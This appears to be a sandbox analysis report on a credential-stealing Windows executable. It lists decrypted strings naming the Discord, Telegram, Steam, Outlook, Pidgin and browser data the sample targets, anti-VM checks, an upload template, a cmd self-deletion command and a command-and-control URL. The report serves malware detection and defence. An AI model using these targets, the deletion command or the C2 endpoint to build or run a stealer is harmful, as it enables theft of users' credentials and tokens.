Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Country: ISO?
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: System Summary:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - HWID:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - OS:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Architecture:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - UserName:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Computer Name:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Local Time:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - UTC:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Language:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Keyboards:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Laptop:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Running Path:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - CPU:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Threads:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Cores:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - RAM:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Display Resolution:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - GPU:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: User Agents:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Installed Apps:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: All Users:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Current User:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process List:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: system_info.txt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: freebl3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: mozglue.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: msvcp140.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: nss3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: softokn3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: vcruntime140.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Temp\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: .exe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: runas
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: open
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /c start
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %DESKTOP%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %APPDATA%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %USERPROFILE%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %DOCUMENTS%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %RECENT%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: *.lnk
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: files
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \discord\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Telegram Desktop\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: key_datas
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: map*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Telegram
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Tox
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: *.tox
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: *.ini
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Password
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 00000001
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 00000002
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 00000003
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 00000004
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Pidgin
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \.purple\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: accounts.xml
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: token:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Valve\Steam
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SteamPath
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \config\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ssfn*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: config.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DialogConfig.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: libraryfolders.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: loginusers.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Steam\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: browsers
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: done
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: soft
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: https
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: POST
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HTTP/1.1
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: hwid
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: build
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: token
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: file_name
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: file
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: message
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: screenshot.jpg
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetProcAddress
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcatA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OpenEventA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateEventA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CloseHandle
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Sleep
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HeapAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcpyA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrlenA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ExitProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: advapi32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: gdi32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: user32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: crypt32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ntdll.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateDCA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ReleaseDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sscanf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VMwareVMware
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HAL9TH
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: JohnDoe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DISPLAY
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: http://193.143.1.226
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /129edec4272dc2c8.php
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /cdb52cf952e86d4b/
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: newpakistan
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalLock
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HeapFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: IsWow64Process
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process32Next
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLocalTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FreeLibrary
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process32First
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DeleteFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindNextFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LocalFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindClose
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LocalAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ReadFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SetFilePointer
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: WriteFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CopyFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualProtect
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLastError
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcpynA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OpenProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: TerminateProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ole32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wininet.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: shell32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: psapi.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SelectObject
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BitBlt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DeleteObject
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoUninitialize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoInitialize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetWindowRect
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CloseWindow
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wsprintfA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CharToOemW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wsprintfW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegCloseKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetConnectA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetOpenA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetReadFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrCmpCA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrStrA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrCmpCW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetModuleFileNameExA
Source: LisectAVT_2403002A_326.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: LisectAVT_2403002A_326.exe, LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://193.143.1.226/129edec4272dc2c8.php
Source: Malware configuration extractor URLs: http://193.143.1.226/129edec4272dc2c8.php
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://.css
